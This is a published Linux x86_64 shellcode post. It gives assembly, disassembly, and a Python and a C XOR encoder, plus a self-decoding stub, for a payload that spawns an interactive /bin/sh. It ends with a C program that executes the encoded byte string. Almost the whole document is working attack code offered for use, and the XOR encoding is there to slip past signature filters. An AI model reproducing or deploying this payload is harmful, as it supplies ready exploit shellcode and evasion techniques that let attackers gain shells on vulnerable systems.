/* # Title : Linux x86_64 XOR encode execve("/bin//sh",{"//bin/sh","-i",NULL},NULL) shellcode # Date : 31-05-2016 # Author : Roziul Hasan Khan Shifat # Tested On : Ubuntu 14.04 LTS x86_64 */ /* main code ------------------------ section .text global _start _start: xor rax,rax xor rdx,rdx push rax push rax mov [rsp],dword '//bi' mov [rsp+4],dword 'n/sh' mov rdi,rsp push rax push rax mov [rsp],word '-i' mov rsi,rsp push rdx push rsi push rdi mov rsi,rsp add rax,59 syscall Disassembly ------------------ Disassembly of section .text: 0000000000400080 <_start>: 400080: 48 31 c0 xor %rax,%rax 400083: 48 31 d2 xor %rdx,%rdx 400086: 50 push %rax 400087: 50 push %rax 400088: c7 04 24 2f 2f 62 69 movl $0x69622f2f,(%rsp) 40008f: c7 44 24 04 6e 2f 73 movl $0x68732f6e,0x4(%rsp) 400096: 68 400097: 48 89 e7 mov %rsp,%rdi 40009a: 50 push %rax 40009b: 50 push %rax 40009c: 66 c7 04 24 2d 69 movw $0x692d,(%rsp) 4000a2: 48 89 e6 mov %rsp,%rsi 4000a5: 52 push %rdx 4000a6: 56 push %rsi 4000a7: 57 push %rdi 4000a8: 48 89 e6 mov %rsp,%rsi 4000ab: 48 83 c0 3b add $0x3b,%rax 4000af: 0f 05 syscall */ /* encoder -------------- I used a python script and a C program to encode shellcode python script --------------------- a="\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\x66\xc7\x04\x24\x2d\x69\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05" print "shellcode length %d"%len(a) a=a[::-1] for i in range(len(a)-1): print a[i].encode('hex') C program ----------------- #include #include main(int i,char *a[]) { if(i!=2) { printf("Usage %s \n",a[0]); return 0; } FILE *f,*o; f=fopen(a[1],"r"); int shell; o=fopen("shellencode.txt","w"); if(!f || !o ) { perror("FILE I/O error: "); return 0; } while( (fscanf(f,"%x",&shell)) !=EOF ) { printf("%.2x\n",shell); fprintf(o,"%#.2x,",shell^0x90); //0x90 is seed key fflush(o); } fclose(o); fclose(f); return 0; } --------------------------------------------------------------------------------------------------------------------------------- I am sorry that My python script is very Poor .Search internet for better XOR encoder python script MY Python script Reverse the shellcode Then COPY & Paste the rerversed shellcode into a file then i use the C program to encode reversed shellcode and write down shellencode.txt ----------------------------------------------------------------------------------------------------------------------------- */ /* decoder --------------- section .text global _start _start: jmp shellcode decoder: pop rsi xor rcx,rcx mov cl,49 cdq mov dl,0x90 ;seed key decode: xor rax,rax mov al,[rsi] xor al,dl dec rsp mov [rsp],byte al inc rsi loop decode call rsp shellcode: call decoder db 0x95,0x9f,0xab,0x50,0x13,0xd8,0x76,0x19,0xd8,0xc7,0xc6,0xc2,0x76,0x19,0xd8,0xf9,0xbd,0xb4,0x94,0x57,0xf6,0xc0,0xc0,0x77,0x19,0xd8,0xf8,0xe3,0xbf,0xfe,0x94,0xb4,0xd4,0x57,0xf9,0xf2,0xbf,0xbf,0xb4,0x94,0x57,0xc0,0xc0,0x42,0xa1,0xd8,0x50,0xa1 Disassembly ------------------- Disassembly of section .text: 0000000000400080 <_start>: 400080: eb 1d jmp 40009f 0000000000400082 : 400082: 5e pop %rsi 400083: 48 31 c9 xor %rcx,%rcx 400086: b1 31 mov $0x31,%cl 400088: 99 cltd 400089: b2 90 mov $0x90,%dl 000000000040008b : 40008b: 48 31 c0 xor %rax,%rax 40008e: 8a 06 mov (%rsi),%al 400090: 30 d0 xor %dl,%al 400092: 48 ff cc dec %rsp 400095: 88 04 24 mov %al,(%rsp) 400098: 48 ff c6 inc %rsi 40009b: e2 ee loop 40008b 40009d: ff d4 callq *%rsp 000000000040009f : 40009f: e8 de ff ff ff callq 400082 4000a4: 95 xchg %eax,%ebp 4000a5: 9f lahf 4000a6: ab stos %eax,%es:(%rdi) 4000a7: 50 push %rax 4000a8: 13 d8 adc %eax,%ebx 4000aa: 76 19 jbe 4000c5 4000ac: d8 c7 fadd %st(7),%st 4000ae: c6 c2 76 mov $0x76,%dl 4000b1: 19 d8 sbb %ebx,%eax 4000b3: f9 stc 4000b4: bd b4 94 57 f6 mov $0xf65794b4,%ebp 4000b9: c0 c0 77 rol $0x77,%al 4000bc: 19 d8 sbb %ebx,%eax 4000be: f8 clc 4000bf: e3 bf jrcxz 400080 <_start> 4000c1: fe (bad) 4000c2: 94 xchg %eax,%esp 4000c3: b4 d4 mov $0xd4,%ah 4000c5: 57 push %rdi 4000c6: f9 stc 4000c7: f2 bf bf b4 94 57 repnz mov $0x5794b4bf,%edi 4000cd: c0 c0 42 rol $0x42,%al 4000d0: a1 .byte 0xa1 4000d1: d8 50 a1 fcoms -0x5f(%rax) */ /* The shellcode decoder.asm is the encoded shellcode */ char shellcode[]="\xeb\x1d\x5e\x48\x31\xc9\xb1\x31\x99\xb2\x90\x48\x31\xc0\x8a\x06\x30\xd0\x48\xff\xcc\x88\x04\x24\x48\xff\xc6\xe2\xee\xff\xd4\xe8\xde\xff\xff\xff\x95\x9f\xab\x50\x13\xd8\x76\x19\xd8\xc7\xc6\xc2\x76\x19\xd8\xf9\xbd\xb4\x94\x57\xf6\xc0\xc0\x77\x19\xd8\xf8\xe3\xbf\xfe\x94\xb4\xd4\x57\xf9\xf2\xbf\xbf\xb4\x94\x57\xc0\xc0\x42\xa1\xd8\x50\xa1"; int main(int i,char *a[]) { (* (int(*)()) shellcode)(); }